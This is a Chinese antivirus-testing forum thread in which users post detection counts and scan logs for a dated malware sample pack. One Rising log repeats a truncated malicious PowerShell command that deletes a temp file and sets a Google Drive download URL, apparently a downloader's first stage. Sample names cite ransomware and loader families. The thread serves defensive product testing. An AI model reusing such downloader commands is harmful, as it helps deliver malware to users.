【开放测试】卡饭病毒样本包 20241010 第170期

yyds_x

卡巴斯基13X：

剩1个

ninjagaocc

瑞星V17
人工智能引擎开+瑞星之剑

右键扫描8x
双击1x

时间        事件        结果        附加信息        
2024-10-11 21:03:37        文件监控        发现威胁Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR        文件路径："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$JwrAL = $host.Version.Major.Equals(2);If ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ($uVHrT + '\Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR 相关进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-11 21:02:06        文件监控        发现威胁Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR        文件路径："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$JwrAL = $host.Version.Major.Equals(2);If ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ($uVHrT + '\Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR 相关进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-11 21:02:05        文件监控        发现威胁Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR        文件路径："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$JwrAL = $host.Version.Major.Equals(2);If ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ($uVHrT + '\Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR 相关进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-11 21:01:20        文件监控        发现威胁Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR        文件路径："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$JwrAL = $host.Version.Major.Equals(2);If ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ($uVHrT + '\Upwin.msu');$jqhpx = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PR 相关进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe        
2024-10-11 21:00:12        右键查杀结束        扫描12个对象，发现0个威胁               
2024-10-11 21:00:10        右键查杀开始        ——               
2024-10-11 20:59:24        右键查杀结束        扫描12个对象，发现0个威胁               
2024-10-11 20:59:23        右键查杀开始        ——               
2024-10-11 20:58:48        右键查杀结束        扫描12个对象，发现0个威胁               
2024-10-11 20:58:47        右键查杀开始        ——               
2024-10-11 20:57:43        产品升级        升级到版本25.00.10.31               
2024-10-11 20:56:13        右键查杀结束        扫描20个对象，发现8个威胁               
2024-10-11 20:56:10        右键查杀开始        ——               

ninjagaocc

华为乾坤

右键扫描7x

双击3x


剩余4x

【1】 2024-10-11 21:26:49，自定义扫描，发现风险6个风险项目

病毒库版本：2024061800
杀毒引擎版本：11.Release_2024062600
开始时间：2024-10-11 21:26:49
总计用时：00:00:21
任务状态：已完成
扫描文件：14
发现风险：6
已处理风险：6
病毒详情：
病毒名称：Win32.Trojan.Generic，病毒文件名称：3693a3c182f20f34dfed51e88691ef6c.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:26:55，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：2024-10-11_af19f3633507a5fb8e1383bd25d68384_avoslocker_hijackloader_rhadamanthys.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:26:57，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：3ce1c88a1bdaf19fc36eb85995e853b6.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:27:00，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：_(SCAN97810-0324-RMA).exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:27:03，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：download.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:27:04，处置结果：处置成功，处置动作：隔离
病毒名称：Win32.Trojan.Generic，病毒文件名称：file.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:27:08，处置结果：处置成功，处置动作：隔离

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】 2024-10-11 21:28:35，自定义扫描，发现风险1个风险项目

病毒库版本：2024101102
杀毒引擎版本：11.Release_2024090200
开始时间：2024-10-11 21:28:35
总计用时：00:00:09
任务状态：已完成
扫描文件：8
发现风险：1
已处理风险：1
病毒详情：
病毒名称：Win32.Trojan.Generic，病毒文件名称：41ecd979cc674d2a1189fde9da4899b13240154e9acb0e54cdd81e08624c2977.exe，病毒文件路径：C:\Users\WDAGUtilityAccount\Desktop\Infected 2024-10-11\Infected 2024-10-11\，病毒等级：中，病毒类型：木马病毒，病毒发现时间：2024-10-11 21:28:40，处置结果：处置成功，处置动作：隔离

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Nocria

IKARUS - 9/14

ii88

EIS + KFA  ，纯静态扫描剩1个

PS：总感觉，腾管自动爬取了样本且第一时间入云库了。。。
要么就是有人专门蹲点了~

GreatMOLA

ESET

123456aaaafsdeg

Luna_ovo 发表于 2024-10-11 20:17
小a高级版：
加强模式开启，高灵敏度

测加强模式没有任何意义

Loyisa

123456aaaafsdeg 发表于 2024-10-11 22:23
测加强模式没有任何意义

羡慕还有加强模式，毛豆的启发拉高拉低没变化

biue

X-Sec 9X


dr.web 5X


腾讯电脑管家 14X

Luna_ovo

123456aaaafsdeg 发表于 2024-10-11 22:23
测加强模式没有任何意义

毕竟是白名单，实机开没问题吧